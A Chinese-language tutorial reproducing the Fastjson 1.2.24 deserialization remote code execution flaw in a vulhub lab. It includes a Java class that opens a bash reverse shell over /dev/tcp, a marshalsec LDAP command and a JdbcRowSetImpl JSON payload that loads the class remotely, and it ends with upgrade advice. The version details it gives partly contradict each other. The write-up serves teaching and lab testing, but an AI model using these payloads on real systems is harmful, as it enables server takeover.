Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)

0x01 漏洞简介:

​         fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。

​         阿里巴巴公司开源Java开发组件Fastjson存在反序列化漏洞(CNVD-2022-40233)。攻击者可利用该漏洞实施任意文件写入、服务端请求伪造等攻击行为,造成服务器权限被窃取、敏感信息泄漏等严重影响。    

0x02 影响版本: 

fastjson<=1.2.24

该漏洞影响fastjson 1.2.80及之前所有版本

 图示:Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)_第1张图片

 0x03 漏洞复现: 

环境准备

被攻击主机:CentOS7(192.168.217.140)

JDK版本:1.8 (shell弹不进去请检查版本)

靶场环境:vulhub/fastjson-1.2.24-rce

攻击主机:kali(192.168.217.141)

使用工具:marshalsec-0.0.3-SNAPSHOT-all.jar ,

GitHub - RandomRobbieBF/marshalsec-jar: marshalsec-0.0.3-SNAPSHOT-all compiled on X64

  • docker拉取镜像
docker-compose up -d

Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)_第2张图片

  • 启动环境并访问,出现下面页面表示访问成功

Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)_第3张图片

漏洞验证:

  • 配合dnslog申请个子域名来探测是否存在漏洞
  • 访问192.168.217.140:8090,使用brup拦截请求  
  • 修改请求方法为post,修改 Content-Type为: application/json
  • 添加请求正文,使用DNSLog进行验证:
{
	"a":{
	"@type":"java.net.Inet4Address",
	"val":"申请的域名"
	}
}

Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)_第4张图片

  • 发送后,dns有返回,证明存在此漏洞

Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)_第5张图片

 漏洞利用:

  • 编辑恶意类,创建一个.java 的文件,以反弹shell为例,而后使用javac命令进行编译而后放于kali中
import java.lang.Runtime;
import java.lang.Process;

public class GetShell {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/192.168.217.141/4444 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)_第6张图片 

  • 在cmd里面使用命令,编译为.class文件
javac GetShell.java

Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)_第7张图片

  • 将生成的文件,放在kali上,并开放http将GetShell.class变成可以访问
python -m SimpleHTTPServer

Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)_第8张图片

  • 然后下载前面的POC,上传至kali。起一个LDAP服务器监听6666端口,远程加载GetShell类,并同时打开监听反弹shell的端口
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.217.141:8000/#GetShell 6666      

  • 然后使用BP抓包,再次修改请求正文,使其下载恶意代码并执行
{
	"b":{
	"@type":"com.sun.rowset.JdbcRowSetImpl",
	"dataSourceName":"ldap://192.168.217.141:6666/GetShell",
	"autoCommit":true
	}
}
  • 按照图示,点击发送

Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)_第9张图片

  • 发送完成后,LDAP服务器接收到请求

Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)_第10张图片

  • httpserver收到get请求

Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)_第11张图片

  • 同时也接收到反弹shell,到此漏洞利用完成

Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)_第12张图片

 0x04 修复方案: 

  • 建议升级到最新版本1.2.83
  • safeMode加固。Fastjson在1.2.68及之后的版本中引入了safeMode,配置safeMode后,无论白名单和黑名单,都不支持 autoType,可杜绝反序列化Gadgets类变种攻击
  • 升级至Fastjson v2

你可能感兴趣的:(漏洞复现,java,安全,网络安全,运维,网络)